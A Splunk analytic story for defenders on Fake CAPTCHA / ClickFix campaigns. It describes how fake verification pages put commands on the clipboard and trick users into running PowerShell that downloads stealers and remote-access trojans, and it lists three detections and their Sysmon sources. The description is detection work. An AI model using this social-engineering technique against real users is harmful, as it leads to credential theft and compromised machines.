Analytics Story: Fake CAPTCHA Campaigns

Date: 2025-05-14 ID: b6578255-250a-4620-8e5e-7946e11ac2e9 Author: Michael Haag, Splunk Product: Splunk Enterprise Security

Description

This analytic story addresses the emerging threat of Fake CAPTCHA and ClickFix campaigns that exploit users' familiarity with verification systems to deliver malware through clipboard manipulation techniques. First observed in early 2024 and increasing through 2025, these campaigns use deceptive interfaces that mimic legitimate CAPTCHA systems to trick users into executing malicious commands.

Why it matters

Fake CAPTCHA campaigns represent a sophisticated evolution in social engineering attacks that rely entirely on manipulating user behavior rather than exploiting technical vulnerabilities. These attacks begin with victims landing on malicious websites through phishing emails, malvertising, or compromised legitimate sites. The site presents what appears to be a standard CAPTCHA verification interface with familiar branding from Google reCAPTCHA or Cloudflare. When users interact with the fake CAPTCHA, malicious JavaScript silently copies commands to their clipboard. Users are then instructed to perform additional verification steps such as pressing Windows+R followed by Ctrl+V, unknowingly pasting and executing malicious commands. These commands typically download and run additional malware using PowerShell scripts that operate in hidden windows. Common payloads include information stealers (Lumma, Redline, Vidar, PureLog), Remote Access Trojans (NetSupport, XWorm, AsyncRAT, Quasar), and multi-stage payloads that can deploy multiple malware families from a single infection.

Detections

Name ▲▼ Technique ▲▼ Type ▲▼
LOLBAS With Network Traffic Ingress Tool Transfer, Exfiltration Over Web Service, System Binary Proxy Execution TTP
Windows PowerShell FakeCAPTCHA Clipboard Execution PowerShell, Malicious Link, Windows Command Shell TTP
Windows RunMRU Command Execution Indirect Command Execution Anomaly

Data Sources

Name ▲▼ Platform ▲▼ Sourcetype ▲▼ Source ▲▼
Sysmon EventID 1 Windows icon Windows xmlwineventlog XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Sysmon EventID 13 Windows icon Windows xmlwineventlog XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Sysmon EventID 3 Windows icon Windows xmlwineventlog XmlWinEventLog:Microsoft-Windows-Sysmon/Operational

References

Source: GitHub | Version: 1